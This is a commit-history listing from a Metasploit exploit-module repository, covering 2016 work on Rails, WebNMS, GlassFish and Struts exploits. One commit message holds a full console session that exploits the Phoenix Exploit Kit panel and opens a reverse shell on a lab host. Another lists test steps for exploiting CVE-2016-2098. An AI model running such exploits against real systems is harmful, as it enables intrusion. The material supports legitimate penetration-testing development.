adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
73,452 Commits 27 Branches 1,043 Tags
3da170a43c7f288fe9bc88fe325da488733acac3
Commit Graph

2936 Commits

Author SHA1 Message Date
mr_me bd646ded1b fixed the check function 2016-10-11 14:06:03 -05:00
mr_me d8f98ccd4e run through msftidy 2016-10-10 22:36:20 -05:00
mr_me f2252bb179 fixed a few things, thanks @h00die 2016-10-10 22:30:01 -05:00
mr_me 3c3f424a4d added a some references 2016-10-10 17:56:03 -05:00
mr_me bca3aab1db added CVE-2016-0752 2016-10-10 17:36:20 -05:00
Pearce Barry 5de1d34869 Land #7341, add module metasploit_static_secret_key_base 2016-09-23 09:20:48 -05:00
Brent Cook 9f3c8c7eee Land #7268, add metasploit_webui_console_command_execution post-auth exploit 2016-09-22 00:50:58 -05:00
Justin Steven dcfbb9ee6a Tidy info 
Replace errant \t with \x20
 2016-09-21 20:14:11 +10:00
Justin Steven 1e24568406 Tweak verbosity re: found secrets 2016-09-21 20:14:08 +10:00
Justin Steven 30d07ce0c7 Tidy metasploit_static_secret_key_base module 
* Inline magic values
* Optimise out dead Rails3-specific code
 2016-09-21 20:13:58 +10:00
Louis Sato 8b1d29feef Land #7304, fix rails_secret_deserialization popchain 2016-09-20 16:05:03 -05:00
Justin Steven a1ca27d491 add module metasploit_static_secret_key_base 2016-09-20 07:04:00 +10:00
Justin Steven 116c754328 tidy Platform 2016-09-15 10:35:42 +10:00
Justin Steven 8a0c8b54fc merge branch 'master' into PR branch 
make Travis happy
 2016-09-15 10:31:24 +10:00
Justin Steven ff1c839b7d appease msftidy 
trailing whitespace
 2016-09-15 08:18:43 +10:00
James Barnett 6509b34da1 Land #7255, Fix issue causing Glassfish to fail uploading to Windows targets. 2016-09-14 12:57:41 -05:00
William Vu 8533e6c5fd Land #7252, ARCH_CMD to ARCH_PHP for phoenix_exec 2016-09-14 10:38:37 -05:00
Pedro Ribeiro 8d4ee3fac6 Forgot the bracket! 2016-09-13 19:01:22 +01:00
Pedro Ribeiro 41bdae4b84 update links and CVE on webnms_file_upload 2016-09-13 18:50:25 +01:00
Justin Steven 17bad7bd4f fix popchain 
ERB changed as per <https://github.com/ruby/ruby/commit/e82f4195d4>
which broke the popchain used for code execution.
 2016-09-13 21:25:14 +10:00
Justin Steven 6bafad44f2 drop 'require uri', tweak option text 2016-09-09 20:31:23 +10:00
Justin Steven 0b012c2496 Combine Unix and Windows modules 2016-09-09 20:28:13 +10:00
wchen-r7 445a43bd97 Trim the fat 2016-08-30 15:56:51 -05:00
wchen-r7 1b505b9b67 Fix #7247, Fix GlassFish on Windows targets 
Fix #7247
 2016-08-30 15:46:08 -05:00
William Vu 7a412031e5 Convert phoenix_exec to ARCH_PHP 2016-08-29 14:14:22 -05:00
William Vu 43a9b2fa26 Fix missing return 
My bad.
 2016-08-29 14:13:18 -05:00
William Vu d50a6408ea Fix missed Twitter handle 2016-08-29 13:46:26 -05:00
William Vu f8fa090ec0 Fix one more missed comma 2016-08-29 13:40:55 -05:00
William Vu 53516d3323 Fix #7220, phoenix_exec module cleanup 2016-08-29 13:28:15 -05:00
Pearce Barry 226ded8d7e Land #6921, Support basic and form auth at the same time 2016-08-25 16:31:26 -05:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution 
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
 2016-08-19 21:29:55 +08:00
Brent Cook 1733d3e1f1 remove obsolete tested-on comment 2016-08-12 17:26:43 -05:00
wchen-r7 f4e4a5dcf3 Fix struts_default_action_mapper payload request delay 
MS-1609
 2016-08-12 15:29:00 -05:00
Brendan 1a7286f625 Land #7062, Create exploit for WebNMS 5.2 RCE 2016-08-12 07:11:48 -07:00
Pedro Ribeiro 07e210c143 Add changes requested to target.uri 2016-08-04 17:50:16 +01:00
William Vu 3b13adba70 Hint about incorrect RAILSVERSION 
If the secret doesn't match, you might have set the wrong RAILSVERSION.
The difference is secret_token (Rails 3) vs. secret_key_base (Rails 4).
 2016-08-01 09:36:25 -07:00
Pedro Ribeiro c93e88f3a3 Make changes requested by wvu-r7 2016-07-20 14:21:04 +02:00
Brent Cook b08d1ad8d8 Revert "Land #6812, remove broken OSVDB references" 
This reverts commit 2b016e0216, reversing
changes made to 7b1d9596c7.
 2016-07-15 12:00:31 -05:00
Brendan 8968a6603e Syntax cleanup 2016-07-14 13:25:31 -07:00
Brendan 927b3a88a1 Changed to one delete 2016-07-14 13:11:59 -07:00
Brent Cook 2b016e0216 Land #6812, remove broken OSVDB references 2016-07-11 22:59:11 -05:00
Brendan 47f2cef22e Syntax changes to humor rubocop and ruby style 2016-07-11 12:50:58 -07:00
wchen-r7 2cc6565cc9 Update rails_actionpack_inline_exec 2016-07-07 15:56:50 -05:00
Pedro Ribeiro eeba35f87a Create file for WebNMS 5.2 remote code execution 2016-07-04 21:07:03 +01:00
RageLtMan fcf8cda22f Add basic module for CVE-2016-2098 
ActionPack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2
implement unsafe dynamic rendering of inline content such that
passing ERB wrapped Ruby code leads to remote execution.

This module only implements the Ruby payloads, but can easily
be extended to use system calls to execute native/alternate
payload types as well.

Test Procedures:
  Clone https://github.com/hderms/dh-CVE_2016_2098
  Run bundle install to match gem versions to those in lockfile
  Run the rails server and configure the metasploit module:
    Set TARGETURI to /exploits
    Configure payload and handler options
  Execute the module, move on to post-exp
 2016-06-28 03:28:16 -04:00
wchen-r7 7cdadca79b Land #6945, Add struts_dmi_rest_exec exploit 2016-06-08 23:16:46 -05:00